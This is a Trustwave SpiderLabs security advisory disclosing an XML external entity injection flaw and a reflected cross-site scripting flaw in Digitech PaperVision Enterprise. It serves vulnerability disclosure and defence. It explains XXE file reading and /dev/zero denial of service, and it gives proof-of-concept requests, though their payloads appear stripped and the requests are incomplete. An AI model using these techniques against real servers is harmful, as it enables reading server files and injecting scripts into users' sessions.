Trustwave SpiderLabs Security Advisory TWSL2017-001: Multiple Vulnerabilities in Digitech Systems PaperVision Enterprise Published: 01/11/2017 Version: 1.0 Vendor: Digitech Systems (http://www.digitechsystems.com/) Product: PaperVision Enterprise Version affected: Prior to release 81.1 Product description: PaperVision Enterprise Content Management (ECM) system, offers all the same features and functionality of an on-premise ECM system. Finding 1: XML External Entity (XXE) Injection Credit: Elvin Hayes Gentiles of Trustwave SpiderLabs By design, XML documents can reference the content of files on the local file system or remote locations using "external entities", also known as "system entities". This functionality forces the XML parser of the application to access the resource specified. Therefore, it is possible to inject an XML DOCTYPE "SYSTEM" directive to access local files on the operating system. Using this technique, it is possible to access any file on the server readable by the application service user. This attack can also be used to create a possible denial of service condition by reading devices such as /dev/zero, which produce a never-ending stream of characters. This could fill up the server's memory and tie up threads if multiple requests were sent. Proof-of-Concept: The following PoC shows an example by sending the SYSTEM directive to access the "C:/WINDOWS/System32/drivers/etc/hosts" file: REQUEST: ======== POST /HTTPIntNet.aspx HTTP/1.1 Host: a.b.c.d User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Cache-Control: no-cache Content-Type: text/xml; charset=utf-8 X-Requested-With: XMLHttpRequest Content-Length: 192 Cookie: Connection: close ]> &xxe; RESPONSE: ========= HTTP/1.1 200 OK Cache-Control: private Content-Type: text/xml; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Tue, 11 Oct 2016 22:59:13 GMT Connection: close Content-Length: 923 There is no function named # COPYRIGHT (C) 1993-2009 MICROSOFT CORP. # # THIS IS A SAMPLE HOSTS FILE USED BY MICROSOFT TCP/IP FOR WINDOWS. # # THIS FILE CONTAINS THE MAPPINGS OF IP ADDRESSES TO HOST NAMES. EACH # ENTRY SHOULD BE KEPT ON AN INDIVIDUAL LINE. THE IP ADDRESS SHOULD # BE PLACED IN THE FIRST COLUMN FOLLOWED BY THE CORRESPONDING HOST NAME. # THE IP ADDRESS AND THE HOST NAME SHOULD BE SEPARATED BY AT LEAST ONE # SPACE. # # ADDITIONALLY, COMMENTS (SUCH AS THESE) MAY BE INSERTED ON INDIVIDUAL # LINES OR FOLLOWING THE MACHINE NAME DENOTED BY A '#' SYMBOL. # # LOCALHOST NAME RESOLUTION IS HANDLED WITHIN DNS ITSELF. # 127.0.0.1 LOCALHOST # ::1 LOCALHOST Finding 2: Authenticated Cross-Site Scripting (XSS) Credit: Elvin Hayes Gentiles of Trustwave SpiderLabs Proof-of-Concept: The following shows a reflected XSS payload injected in the 'printTextOnly' parameter: REQUEST: ======== GET /ExportResults.aspx?printTextOnly= HTTP/1.1 Host: a.b.c.d User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Cookie: [Snipped] Connection: close Upgrade-Insecure-Requests: 1 RESPONSE: ========= HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Wed, 12 Oct 2016 00:45:47 GMT Connection: close Content-Length: 135 Remediation Steps: Contact Digitech Systems for the PaperVision 81.1 release update. PaperVision release 82 will also address these findings. Please note that Trustwave SpiderLabs have not verified this fix. Revision History: 10/18/2016 - Vulnerability disclosed to vendor 11/10/2016 - Patch released by vendor 01/06/2017 - PaperVision Enterprise release 82 became available 01/11/2017 - Advisory published About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave's SpiderLabs: SpiderLabs is the advance security team at Trustwave responsible for incident response and forensics, ethical hacking and application security tests for Trustwave's clients. SpiderLabs has responded to hundreds of security incidents, performed thousands of ethical hacking exercises and tested the security of hundreds of business applications for Fortune 500 organizations. For more information visit https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.